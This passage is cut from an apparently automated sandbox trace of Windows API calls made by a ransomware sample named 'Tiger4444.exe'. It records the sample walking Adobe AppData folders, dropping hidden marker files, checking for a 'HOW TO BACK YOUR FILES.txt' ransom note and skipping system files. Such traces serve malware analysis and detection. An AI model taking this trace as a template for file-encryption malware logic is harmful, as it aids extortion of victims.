dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.556] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.556] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.557] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.557] CloseHandle (hObject=0x2b8) returned 1 [0058.557] CloseHandle (hObject=0x2c4) returned 1 [0058.557] GetCurrentThreadId () returned 0xfa8 [0058.557] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0058.557] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" [0058.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f380 | out: hHeap=0xc50000) returned 1 [0058.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0058.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" [0058.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\" [0058.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3" [0058.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\headlights\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.558] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.810] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.857] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.857] CloseHandle (hObject=0x2c4) returned 1 [0058.861] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned 48 [0058.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.861] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87ec3a9e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0058.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.861] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.861] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.861] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.861] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x87ec3a9e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.861] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.861] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.861] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.861] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.861] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.861] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87ec3a9e, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87ec3a9e, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8812623d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.861] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.861] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.862] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x87ec3a9e, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x87ec3a9e, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8812623d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0058.862] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0058.862] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\headlights\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.869] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.869] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.869] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.869] CloseHandle (hObject=0x2b8) returned 1 [0058.869] CloseHandle (hObject=0x2c4) returned 1 [0058.869] GetCurrentThreadId () returned 0xfa8 [0058.869] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0058.869] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" [0058.869] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8f5b0 | out: hHeap=0xc50000) returned 1 [0058.869] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0058.869] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player" [0058.869] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\" [0058.869] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3" [0058.870] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.884] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.890] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.923] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.924] CloseHandle (hObject=0x2c4) returned 1 [0058.939] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player") returned 50 [0058.939] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.939] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x881e4e51, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0058.940] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.940] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.940] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.940] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.940] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x881e4e51, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.942] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.945] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.945] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.945] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.945] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.945] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x881bea11, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x881bea11, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x881e4e51, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.945] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.945] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.945] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5380e4e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe5380e4e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe538be0f, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2="Tiger4444.exe") returned -1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2=".") returned 1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2="..") returned 1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2="windows") returned -1 [0058.945] lstrcmpiW (lpString1="AssetCache", lpString2="bootmgr") returned -1 [0058.946] lstrcmpiW (lpString1="AssetCache", lpString2="pagefile.sys") returned -1 [0058.946] lstrcmpiW (lpString1="AssetCache", lpString2="boot") returned -1 [0058.946] lstrcmpiW (lpString1="AssetCache", lpString2="ids.txt") returned -1 [0058.946] lstrcmpiW (lpString1="AssetCache", lpString2="NTUSER.DAT") returned -1 [0058.946] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="AssetCache" | out: lpString1="AssetCache") returned="AssetCache" [0058.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0058.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc71840 [0058.946] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc664c8 [0058.946] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52e83dd, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="Tiger4444.exe") returned -1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2=".") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="..") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="windows") returned -1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="bootmgr") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="pagefile.sys") returned -1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="boot") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="ids.txt") returned 1 [0058.946] lstrcmpiW (lpString1="NativeCache", lpString2="NTUSER.DAT") returned -1 [0058.946] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="NativeCache" | out: lpString1="NativeCache") returned="NativeCache" [0058.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0058.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7e) returned 0xc71510 [0058.946] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc66528 [0058.946] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52e83dd, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0058.946] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0058.946] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0058.946] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0058.947] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0058.948] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0058.948] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0058.948] CloseHandle (hObject=0x2b8) returned 1 [0058.948] CloseHandle (hObject=0x2c4) returned 1 [0058.948] GetCurrentThreadId () returned 0xfa8 [0058.948] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0058.948] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0058.948] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0058.948] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0058.948] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0058.948] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\" [0058.948] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3" [0058.948] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\flash player\\nativecache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0058.952] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0058.954] FlushFileBuffers (hFile=0x2c4) returned 1 [0058.963] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0058.963] CloseHandle (hObject=0x2c4) returned 1 [0058.964] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 62 [0058.964] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.964] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8827d61a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0058.964] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.964] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.964] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0058.964] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.964] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8827d61a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.964] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.964] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.964] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8827d61a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8827d61a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8827d61a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0058.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.964] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0058.964] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe52e83dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe52e83dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe52f2009, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NativeCache.directory", cAlternateFileName="NATIVE~1.DIR")) returned 1 [0058.964] lstrcmpiW (lpString1="NativeCache.directory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0058.964] lstrcmpiW (lpString1="NativeCache.directory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.964] lstrcmpiW (lpString1="NativeCache.directory", lpString2="Tiger4444.exe") returned -1 [0058.964] lstrcmpiW (lpString1="NativeCache.directory", lpString2=".") returned 1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="..") returned 1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="windows") returned -1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="bootmgr") returned 1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="pagefile.sys") returned -1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="boot") returned 1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="ids.txt") returned 1 [0058.965] lstrcmpiW (lpString1="NativeCache.directory", lpString2="NTUSER.DAT") returned -1 [0058.965] lstrcpyW (in: lpString1=0x30aeb26, lpString2="NativeCache.directory" | out: lpString1="NativeCache.directory") returned="NativeCache.directory" [0058.965] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\NativeCache.directory", dwFileAttributes=0x0) returned 1 [0058.977] lstrlenW (lpString="NativeCache.directory") returned 21 [0058.977] lstrlenW (lpString="Tiger4444") returned 9 [0058.977] lstrcmpiW (lpString1="directory", lpString2="Tiger4444") returned -1 [0058.977] lstrlenW (lpString=".dll") returned 4 